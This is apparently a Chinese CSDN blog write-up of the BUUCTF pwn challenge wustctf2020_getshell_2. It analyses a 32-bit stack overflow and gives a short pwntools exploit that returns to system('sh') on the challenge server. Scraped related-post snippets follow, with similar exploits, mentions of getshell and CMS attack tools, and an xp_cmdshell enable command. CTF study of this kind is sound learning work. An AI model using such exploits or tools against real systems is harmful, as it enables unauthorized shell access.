wustctf2020_getshell_2

最新推荐文章于 2023-11-14 19:43:03 发布

爱若 AI_ruo

最新推荐文章于 2023-11-14 19:43:03 发布

阅读量118

点赞数

分类专栏： pwn刷题文章标签：网络安全

本文链接：https://blog.csdn.net/m0_73756460/article/details/128681744

版权

pwn刷题专栏收录该内容

34 篇文章 0 订阅

订阅专栏

wustctf2020_getshell_2

惯例先checksec一下
在这里插入图片描述

一个开启了nx保护的32位程序放进ida里看看 main函数没啥信息跳转到vulnerable函数看看

在这里插入图片描述

vulnable函数存在一个十分明显的栈溢出漏洞但是只能溢出0xc的内容

在这里插入图片描述

shift+f12打开字符串表没找到/bin/sh 但在shell函数处找到了system函数
请添加图片描述
利用ROPgadget找到sh的地址
在这里插入图片描述

请添加图片描述

exp：

from pwn import *
io=remote('node4.buuoj.cn',25465)
system=0x8048529
sh=0x8048670
io.recv()
payload='a'*(0x18+4)+p32(system)+p32(sh)
io.sendline(payload)
io.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

爱若 AI_ruo

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
wustctf2020_getshell_2

buuctf刷题 wustctf2020_getshell_2（writeup）
复制链接

扫一扫

专栏目录

buuctf wustctf2020_getshell_2 ret2shellcode

weixin_45441024的博客

12-01

628

BUUCTF wustctf2020_getshell_2 check一下，32位的程序且没有开任何保护用ida打开，vuln很明显这是一个漏洞函数，f5查看一下伪代码，可以看到buf距离栈底0x18个字节这是shell函数的伪代码，我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用，那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe

ThinkPHP_getshell-v2.zip

11-11

标题“ThinkPHP_getshell-v2.zip”提示我们关注的是与ThinkPHP框架相关的安全问题，特别是一个可能导致getshell的漏洞。Getshell通常指的是攻击者能够通过某种方式在目标服务器上执行命令，这通常与代码注入漏洞相关...

参与评论您还未登录，请先登录后发表或查看评论

[buuctf]wustctf2020_getshell_2

逆向萌新的博客

07-03

307

[buuctf]wustctf2020_getshell_2

Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni

09-11

2. getshell：这是一个安全术语，指通过安全漏洞在远程服务器上获取命令执行的能力，从而控制服务器。 3. MacCMSgetshell：这表示该工具专门用于针对MacCMS系统获取shell。 4. 菜刀工具mac：这里的“菜刀”是一种...

SQL Server阻止了对组件xp_cmdshell过程的解决方案.docx

06-23

2. **启用xp_cmdshell：** 接下来，你需要启用`xp_cmdshell`： ``` sp_configure 'xp_cmdshell', 1; reconfigure; ``` 3. **验证设置：** 为了确认`xp_cmdshell`已经启用，你可以再次运行`sp_configure 'xp_...

shell_config.rar_Linux shell_parsing shell_shell config_get_sh

09-19

标题"shell_config.rar_Linux shell_parsing shell_shell config_get_sh"暗示了我们要讨论的是如何使用Shell脚本来解析配置文件并获取其中的变量参数。这个过程在系统管理、应用程序自动化或者脚本编程中非常常见。 ...

工具源码.zip_c段查询_getshell_漏洞扫描_爆破_端口爆破

07-13

工具功能 1：漏洞扫描 2:：0day测试 3：cms漏洞扫描 4：旁注c段查询 ...9：Getshell自动 10：穷举爆破 11：漏洞爬行 12：安全文章对接推送 13：Struts2-045 -016 测试 14：信息收集 15：MD5解密 16：端口扫描

BUUCTF pwn——wustctf2020_getshell_2

CNS-Enterprise BCC-1701-J

05-23

119

BUUCTF 做题练习

[BUUCTF-pwn]——wustctf2020_getshell_2

Y_peak的博客

03-19

405

[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()

[buuctf]wustctf2020_getshell

逆向萌新的博客

07-02

628

[buuctf]wustctf2020_getshell

[BUUCTF]PWN——wustctf2020_getshell1/2

mcmuyanga的博客

11-11

1186

wustctf2020_getshell 附件步骤：例行检查，32位程序，开启了NX保护本地试运行一下程序，看看大概的情况 32位ida载入，习惯性的检索程序里的字符串，发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞，正好溢出8位，让我们覆盖到ret exp： from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B

wustctf2020_getshell

m0sway的博客

11-28

773

wustctf2020_getshell 使用checksec查看：只开启了一个栈不可执行，没开Canary，考虑栈溢出题目。拉进IDA中查看：主函数中直接给漏洞函数，跟进： read()函数，能读取0x20的数据，buf距离ebp0x18，因为这是个32位的程序，ebp+4后还能放下一个one_gadget 首先考虑下这个程序本身有没有get_shell的函数，通过搜索字符串可以发现函数shell()： ok了，这题直接秒了。 exp： from pwn import * #start

[BUUCTF-pwn]——wustctf2020_getshell

Y_peak的博客

03-16

176

[BUUCTF-pwn]——wustctf2020_getshell 额，太简单了直接上exploit吧直接利用栈溢出，修改返回地址就好 from pwn import * p = remote('node3.buuoj.cn',28241) payload = 'a' * (0x18+4) + p32(0x0804851B) p.send(payload) p.interactive()

[WUSTCTF 2020]getshell

最新发布

沈理大学牲的博客

11-14

148

发现后门函数 shell，并且在vuin函数存在栈溢出。file 和checksec 检查文件。一道简单的ret2text。

[BUUCTF]PWN——wustctf2020_getshell

BangSen1的博客

03-30

276

wustctf2020_getshell 例行检查，开启NX保护，32位，运行一下，打印出一个图形。用IDA打开。看到了关键函数。 shelladdr=0x804851B 查看主函数，buf的长度为0x18，读取的长度为0x20，可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',28128) shelladdr=0x804851B payload='a'*(0x18+4)+p32(shelladdr) r.sendline(payl

hadoop_getshell

09-05

hadoop_getshell指的是利用Hadoop漏洞获取系统shell权限。Hadoop是一个开放源代码的分布式存储和计算框架，被广泛应用于大数据处理。但是，由于Hadoop的复杂性和开放性，可能存在各种漏洞和安全风险。 Hadoop_getshell通常是通过利用Hadoop的可远程读写文件的特性进行的攻击。攻击者利用该特性上传恶意的Jar文件，这个Jar文件包含了指令，能够执行系统命令，从而获取到服务器的shell权限。一旦攻击者成功获取到shell权限，他们就可以在系统中执行各种操作，包括但不限于查看、修改、删除敏感数据，制造破坏或者窃取敏感信息。防范hadoop_getshell攻击的关键是加强Hadoop集群的安全性。以下是一些常见的防御措施： 1. 及时更新Hadoop的版本和补丁，以修复已知的安全漏洞。 2. 限制Hadoop集群的访问权限。只有授权用户才能访问和操作集群。 3. 配置防火墙，限制对Hadoop集群的外部访问。 4. 定期审查Hadoop集群的日志，寻找异常行为和潜在的安全威胁。 5. 定期进行安全扫描和漏洞扫描，发现潜在的安全漏洞并及时修复。 6. 加强系统的监控和入侵检测，及时发现并应对异常活动。 7. 对Hadoop集群进行访问控制，使用强密码、多因素认证等加固账户安全。 8. 监控网络流量，发现并阻止异常的数据传输行为。 9. 定期进行安全培训和意识提升，提高员工对安全风险和攻击手段的认知。总之，要防范hadoop_getshell攻击，需要综合应用多种防御措施，不断加强Hadoop集群的安全性，保护好大数据环境中的敏感信息。